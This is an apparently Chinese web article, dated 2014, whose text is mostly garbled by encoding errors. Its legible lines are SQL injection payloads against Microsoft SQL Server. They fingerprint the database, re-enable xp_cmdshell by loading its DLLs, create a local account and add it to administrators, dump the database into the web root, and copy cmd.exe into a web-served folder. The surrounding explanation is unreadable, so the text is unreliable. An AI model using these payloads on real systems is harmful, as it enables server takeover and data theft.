???????????????????
???????????? ???????[ 2014/5/26 13:22:32 ] ??????????????? ??????? ???????
????????????????????????????????????????????????????????????????shell?????????????????????????????
????????????????????и??·???????????ɡ??????????????·?????????£?
?????ж?????sql????????sql???????ж???????????????mssqlserver????洢????xp_cmdshell ????????????????б??????????????????????????xp_cmdshell ?洢?????????????????
?????ж??????????????????????asp????仰?????????webshell?????????webshell??????shell??
?????????????sa?????????·???????
????????????·?????濪?????
?????????????·???
??????????ж?????sql??????????????????ù????????裬????????????webcruiser????????С?????????????????????????sql??????????????????????????????????????????????????????????????sql?????????????xp_cmdshell??
???????巽???????????
?????????????????
?????Id=1234;and (select count(*) from sysobjects)>0
?????????????????????????????????sa?????
?????id=1234;and user>0 (?????dbo ?????sa)??
?????id=1234;and db_name()>0?????????????????????????????????
??????xp_cmdshell??????á?
?????id=1234;and (select count(*) from master.dbo.sysobjects where xtype=”X” and name =’xp_cmdshell’)
??????洢?????????????????
?????id=1234;and exec sp_addextendepro xp_cmdshell??’xplog70.dll’
???????????????????????????·?????
????l ?????? DLL xpsql70.dll ???DLL ?????????DLL?????126 (???????????)??
??????????У?exec sp_dropextendeproc “xp_cmdshell” ????????sp_addextendeproc “xp_cmdshell”??”xpsql70.dll”
????l ??????xpweb70.dll ?????????xp_cmdshell ???127
??????????? exec sp_dropextendeproc “xp_cmdshell” ???????? exec sp_addextendeproc “xp_cmdshell”??”xpweb70.dll”
??????????洢?????????????????????
?????id=1234 ;exec master..xp_cmdshell “net user aaa bbb /add ”-- ????aaa????????bbb?????
??????????????飺
?????id=1234 ;exec master..xp_cmdshell “net localgroup administrators aaa/add ”
?????????????????????
?????id=1234 ;exec backup database ??????? to disk =’C:inetpub/wwwrootsave.db’?????????????web????·????
????????????web????·?????????????????????unicode ???????????????????
?????id=1234;exec master..xp_cmdshell “copy c:windowssystem32cmd.exe c:inetpubscriptscmd.exe”
??????????????????xp_cmdshell ???????????????е?????????????????????????
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com